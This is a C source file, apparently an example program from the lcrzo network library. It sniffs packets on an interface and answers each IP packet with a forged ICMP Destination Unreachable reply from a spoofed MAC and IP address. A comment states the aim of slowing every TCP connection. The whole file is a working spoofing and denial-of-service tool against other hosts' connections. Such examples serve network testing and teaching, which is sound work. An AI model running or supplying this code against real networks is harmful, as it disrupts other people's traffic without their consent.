
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000374=
{ /*reference*/     "lcrzoex", 374,
  /*version*/       1, 0,
  /*title*/         "sniff and send ICMP Unreachable",
  /*french title*/  "sniffe et envoie des ICMP Unreachable",
  /*description*/   "Read lcrzo_icmp for a list of valid codes",
  /*french desc.*/  "Lisez lcrzo_icmp pour une liste de codes valides",
  /*usage*/         "device fakesrceth fakesrcip code [\"bpf_filter\"]",
  /*french usage*/  "device ethsrc ipsrc code [\"filtre_bpf\"]",
  /*usage example*/ "eth0 11:22:33:44:55:66 1.2.3.4 1 \"tcp and net 1.2.3.0/24\"",
  /*fr. usage ex.*/ "eth0 11:22:33:44:55:66 1.2.3.4 1 \"tcp and net 1.2.3.0/24\"",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declaration */
int lcrzoex_000374_main(int argc, char *argv[]);
int lcrzoex_000374_sendicmp(lcrzo_data ethdata, 
			    lcrzo_int32 ethdatasize,
			    lcrzo_device device,
			    lcrzo_etha fakeeth,
			    lcrzo_ipl fakeip,
			    lcrzo_uint8 icmpcode);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000374_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_uint32 mtu;
  lcrzo_sniff sniff;
  lcrzo_data sniffdata;
  lcrzo_int32 sniffdatasize;
  lcrzo_string snifffilter;
  lcrzo_uint8 icmpcode;
  lcrzo_etha fakeeth;
  lcrzo_ipl fakeip;
  int ret;

  lcrzo_init();
  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000374, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device and mtu */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));
  lcrzo_epr(lcrzo_mtu_init_device(device, &mtu));

  /* initialize values */
  lcrzo_epr(shared_para_etha_init_src(argv[2], fakeeth));
  lcrzo_epr(shared_para_ipl_init_src(argv[3], &fakeip));
  lcrzo_epr(lcrzo_uint8_init_text(argv[4], &icmpcode));

  /* init sniff */
  if (argc<=5)
  { lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_NORMAL,
			       "", &sniff));
  }
  else
  { lcrzo_epr(shared_para_string_init_snifffilter(argv[5], &snifffilter));
    lcrzo_epr(lcrzo_sniff_init(device, mtu, LCRZO_SNIFF_TYPE_NORMAL, 
			       snifffilter, &sniff));
    lcrzo_epr(lcrzo_string_free2(&snifffilter));
  }

  /* main loop */
  ret=LCRZO_ERR_OK; /* just for the compiler warning */
  while (LCRZO_TRUE)
  { /* sniff next packet */
    ret=lcrzo_sniff_nextm(&sniff, LCRZO_WAIT_INFINITE, 
			  &sniffdata, &sniffdatasize);
    if (ret!=LCRZO_ERR_OK) break;
    /*lcrzo_packet_print_eth(sniffdata, sniffdatasize,
                             LCRZO_PRINTPROFILE_SYNTHSYNTH);*/
    /* now, we slow every TCP connection */
    ret=lcrzoex_000374_sendicmp(sniffdata, sniffdatasize,
				device, fakeeth, fakeip, icmpcode);
    if (ret!=LCRZO_ERR_OK) break;
    lcrzo_epr(lcrzo_data_free2(&sniffdata));
  }

  /* close everything */
  lcrzo_epr(lcrzo_sniff_close(&sniff));
  lcrzo_epr(lcrzo_err_print(ret));
  lcrzo_close();
  return (ret);
}

/*-------------------------------------------------------------*/
int lcrzoex_000374_sendicmp(lcrzo_data ethdata, 
			    lcrzo_int32 ethdatasize,
			    lcrzo_device device,
			    lcrzo_etha fakeeth,
			    lcrzo_ipl fakeip,
			    lcrzo_uint8 icmpcode)
{ lcrzo_hdrleth  recv_hdreth,  send_hdreth;
  lcrzo_hdrlip   recv_hdrip,   send_hdrip;
  lcrzo_hdrlicmp recv_hdricmp;
  lcrzo_data ipdata, packet;
  lcrzo_uint16 ipdatasize;
  lcrzo_int32 packetsize;
  lcrzo_spoof spoof;
  int ret;

  /* only reply to IP packets */
  ret=lcrzo_packet_decodem_ethdata(ethdata, ethdatasize, &recv_hdreth,
				   &ipdata, &ipdatasize);
  if ( ret!=LCRZO_ERR_OK )
    return(LCRZO_ERR_OK);
  if (recv_hdreth.type!=LCRZO_HDRLETH_TYPE_IP)
  { lcrzo_er(lcrzo_data_free2(&ipdata));
    return(LCRZO_ERR_OK);
  }

  /* do not reply to identical ICMPs */
  ret=lcrzo_packet_decodem_ipopticmpdata(ipdata, ipdatasize,
					 &recv_hdrip, NULL, NULL,
					 &recv_hdricmp, NULL, NULL);
  if ( ret==LCRZO_ERR_OK )
  { if (recv_hdricmp.type==LCRZO_ICMPTYPE_DESTUNREACH)
    { lcrzo_er(lcrzo_data_free2(&ipdata));
      return(LCRZO_ERR_OK);
    }
  }

  /* create the new Ethernet header */
  lcrzo_er(lcrzo_hdrleth_initdefault(&send_hdreth));
  lcrzo_er(lcrzo_etha_init_etha(fakeeth, send_hdreth.src));
  lcrzo_er(lcrzo_etha_init_etha(recv_hdreth.src, send_hdreth.dst));

  /* create the new IP header */
  lcrzo_er(lcrzo_hdrlip_initdefault(&send_hdrip));
  send_hdrip.saddr=fakeip;
  send_hdrip.daddr=recv_hdrip.saddr;

  /* create the packet */
  lcrzo_er(lcrzo_packet_initm_ethipopticmpdestunreach(send_hdreth,
						      send_hdrip,
						      NULL, 0,
						      icmpcode,
						      ipdata, ipdatasize,
						      &packet, &packetsize));
  lcrzo_er(lcrzo_data_free2(&ipdata));

  /* send packet */
  lcrzo_er(lcrzo_spoof_init(&spoof));
  lcrzo_er(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_FALSE));
  lcrzo_er(lcrzo_spoof_set_printprofile(&spoof, 
					 LCRZO_PRINTPROFILE_SYNTHSYNTH));
  lcrzo_er(lcrzo_spoof_eth(&spoof, device, packet, packetsize));
  lcrzo_er(lcrzo_data_free2(&packet));
  lcrzo_er(lcrzo_spoof_close(&spoof));
  return (LCRZO_ERR_OK);
}
